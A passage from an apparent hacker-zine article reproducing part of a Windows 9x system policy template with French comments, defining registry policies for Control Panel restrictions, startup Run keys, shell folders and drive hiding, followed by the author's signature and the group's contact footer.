REQUIRED VALUENAME sysLocation END PART END POLICY END CATEGORY CATEGORY !!Update POLICY !!RemoteUpdate KEYNAME System\CurrentControlSet\Control\Update ACTIONLISTOFF VALUENAME "UpdateMode" VALUE NUMERIC 0 END ACTIONLISTOFF PART !!UpdateMode DROPDOWNLIST REQUIRED VALUENAME "UpdateMode" ITEMLIST NAME !!UM_Automatic VALUE NUMERIC 1 NAME !!UM_Manual VALUE NUMERIC 2 END ITEMLIST END PART PART !!UM_Manual_Path EDITTEXT VALUENAME "NetworkPath" END PART PART !!DisplayErrors CHECKBOX VALUENAME "Verbose" END PART PART !!LoadBalance CHECKBOX VALUENAME "LoadBalance" END PART END POLICY END CATEGORY ; Update END CATEGORY ; Network CATEGORY !!System KEYNAME Software\Microsoft\Windows\CurrentVersion\Setup POLICY !!EnableUserProfiles KEYNAME Network\Logon VALUENAME UserProfiles les profils sont activ�s par la bo�te de dialogue: "Propri�t�s pour Mots de passe " END POLICY POLICY !!NetworkSetupPath PART !!NetworkSetupPath_Path EDITTEXT REQUIRED VALUENAME "SourcePath" END PART END POLICY POLICY !!NetworkTourPath PART !!NetworkTourPath_Path EDITTEXT REQUIRED VALUENAME "TourPath" END PART PART !!NetworkTourPath_TIP TEXT END PART END POLICY POLICY !!Run KEYNAME Software\Microsoft\Windows\CurrentVersion\Run PART !!RunListbox LISTBOX EXPLICITVALUE END PART END POLICY POLICY !!RunOnce KEYNAME Software\Microsoft\Windows\CurrentVersion\RunOnce PART !!RunOnceListbox LISTBOX EXPLICITVALUE END PART END POLICY POLICY !!RunServices KEYNAME Software\Microsoft\Windows\CurrentVersion\RunServices PART !!RunServicesListbox LISTBOX EXPLICITVALUE END PART END POLICY END CATEGORY CLASS USER CATEGORY !!ControlPanel CATEGORY !!CPL_Display POLICY !!CPL_Display_Restrict KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\System PART !!CPL_Display_Disable CHECKBOX VALUENAME NoDispCPL END PART PART !!CPL_Display_HideBkgnd CHECKBOX VALUENAME NoDispBackgroundPage END PART PART !!CPL_Display_HideScrsav CHECKBOX VALUENAME NoDispScrSavPage END PART PART !!CPL_Display_HideAppearance CHECKBOX VALUENAME NoDispAppearancePage END PART PART !!CPL_Display_HideSettings CHECKBOX VALUENAME NoDispSettingsPage END PART END POLICY END CATEGORY ; Display CATEGORY !!CPL_Network POLICY !!CPL_Network_Restrict KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\Network PART !!CPL_Network_Disable CHECKBOX VALUENAME NoNetSetup END PART PART !!CPL_Network_HideID CHECKBOX VALUENAME NoNetSetupIDPage END PART PART !!CPL_Network_HideAccessCtrl CHECKBOX VALUENAME NoNetSetupSecurityPage END PART END POLICY END CATEGORY ; Network CATEGORY !!CPL_Security POLICY !!CPL_Security_Restrict KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\System PART !!CPL_Security_Disable CHECKBOX VALUENAME NoSecCPL END PART PART !!CPL_Security_HideSetPwds CHECKBOX VALUENAME NoPwdPage END PART PART !!CPL_Security_HideRemoteAdmin CHECKBOX VALUENAME NoAdminPage END PART PART !!CPL_Security_HideProfiles CHECKBOX VALUENAME NoProfilePage END PART END POLICY END CATEGORY ; Security CATEGORY !!CPL_Printers POLICY !!CPL_Printers_Restrict KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\Explorer PART !!CPL_Printers_HidePages CHECKBOX VALUENAME NoPrinterTabs END PART PART !!CPL_Printers_DisableRemoval CHECKBOX VALUENAME NoDeletePrinter END PART PART !!CPL_Printers_DisableAdd CHECKBOX VALUENAME NoAddPrinter END PART END POLICY END CATEGORY ; Printers CATEGORY !!CPL_System POLICY !!CPL_System_Restrict KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\System PART !!CPL_System_HideDevMgr CHECKBOX VALUENAME NoDevMgrPage END PART PART !!CPL_System_HideConfig CHECKBOX VALUENAME NoConfigPage END PART PART !!CPL_System_NoFileSys CHECKBOX VALUENAME NoFileSysPage END PART PART !!CPL_System_NoVirtMem CHECKBOX VALUENAME NoVirtMemPage END PART END POLICY END CATEGORY ; System END CATEGORY ; Control Panel CATEGORY !!Desktop KEYNAME "Control Panel\Desktop" POLICY !!Wallpaper PART !!WallpaperName COMBOBOX REQUIRED SUGGESTIONS !!Wallpaper1 !!Wallpaper2 !!Wallpaper3 !!Wallpaper4 !!Wallpaper5 !!Wallpaper6 !!Wallpaper7 !!Wallpaper8 !!Wallpaper9 !!Wallpaper10 END SUGGESTIONS VALUENAME "Wallpaper" (voir page 15) END PART PART !!TileWallpaper CHECKBOX DEFCHECKED VALUENAME "TileWallpaper" VALUEON "1" VALUEOFF "0" END PART END POLICY POLICY !!ColorScheme PART !!SchemeName DROPDOWNLIST KEYNAME "Control Panel\Appearance" VALUENAME Current REQUIRED ITEMLIST (liste de mod�les de couleur effac�e car trop longue et sans grand int�r�t) END ITEMLIST END PART END POLICY END CATEGORY ; desktop CATEGORY !!Network KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\Network CATEGORY !!Sharing POLICY !!DisableFileSharingCtrl VALUENAME NoFileSharingControl END POLICY POLICY !!DisablePrintSharingCtrl VALUENAME NoPrintSharingControl END POLICY END CATEGORY ; Sharing END CATEGORY ; Network CATEGORY !!Shell KEYNAME "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" CATEGORY !!CustomFolders POLICY !!CustomFolders_Programs PART !!CustomFolders_ProgramsPath EDITTEXT REQUIRED VALUENAME "Programs" END PART END POLICY POLICY !!CustomFolders_Desktop PART !!CustomFolders_DesktopPath EDITTEXT REQUIRED VALUENAME "Desktop" END PART END POLICY POLICY !!HideStartMenuSubfolders KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\Explorer VALUENAME NoStartMenuSubFolders PART !!HideStartMenuSubfolders_Tip1 TEXT END PART PART !!HideStartMenuSubfolders_Tip2 TEXT END PART END POLICY POLICY !!CustomFolders_Startup PART !!CustomFolders_StartupPath EDITTEXT REQUIRED VALUENAME "Startup" END PART END POLICY POLICY !!CustomFolders_NetHood PART !!CustomFolders_NetHoodPath EDITTEXT REQUIRED VALUENAME "NetHood" END PART END POLICY POLICY !!CustomFolders_StartMenu PART !!CustomFolders_StartMenuPath EDITTEXT REQUIRED VALUENAME "Start Menu" END PART END POLICY END CATEGORY CATEGORY !!Restrictions KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\Explorer POLICY !!RemoveRun VALUENAME "NoRun" END POLICY POLICY !!RemoveFolders VALUENAME "NoSetFolders" END POLICY POLICY !!RemoveTaskbar VALUENAME "NoSetTaskbar" END POLICY POLICY !!RemoveFind VALUENAME "NoFind" END POLICY POLICY !!HideDrives VALUENAME "NoDrives" VALUEON NUMERIC 67108863 ; low 26 bits on (1 bit per drive) END POLICY POLICY !!HideNetHood VALUENAME "NoNetHood" END POLICY POLICY !!NoEntireNetwork KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\Network VALUENAME "NoEntireNetwork" END POLICY POLICY !!NoWorkgroupContents KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\Network VALUENAME "NoWorkgroupContents" END POLICY POLICY !!HideDesktop VALUENAME "NoDesktop" END POLICY POLICY !!DisableClose VALUENAME "NoClose" END POLICY POLICY !!NoSaveSettings VALUENAME "NoSaveSettings" END POLICY END CATEGORY END CATEGORY ; Shell CATEGORY !!System KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\System CATEGORY !!Restrictions POLICY !!DisableRegedit VALUENAME DisableRegistryTools END POLICY POLICY !!RestrictApps KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\Explorer VALUENAME RestrictRun PART !!RestrictAppsList LISTBOX + liste KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun VALUEPREFIX "" END PART END POLICY POLICY !!DisableMSDOS KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp VALUENAME Disabled END POLICY POLICY !!DisableSingleMSDOS KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp VALUENAME NoRealMode END POLICY END CATEGORY END CATEGORY --------------------------------------------------------------------------- \\\___/// \\ - - // Live Well( @ @ )Do Good +---------------oOOo-(_)-oOOo--------------------------------------+ | NtWak0 . --:)MCSEx2, Telcom. Eng., Security Senior | |"Kn0w13dg3 i5 0n1y p0w3r if U hav3 th3 wi5d0m t0 us3 i7 c0rr3c71y"| |"I7'5 nic3 70 b3 imp0r7an7. Bu7 i7'5 m0r3 imp0r7an7 70 b3 nic3" | +------------------------Oooo--------------------------------------+ --------------------------------------------------------------------------- L E G I O N S O F T H E U N D E R G R O U N D --------------------------------------------------------------------------- Send Submissions! kv@legions.org | digi@wintermute.unixgeeks.com Send Comments! kv@legions.org | digi@wintermute.unixgeeks.com Send Money! Please send email,so we can direct you to our swissbank account [This has been a LoU production]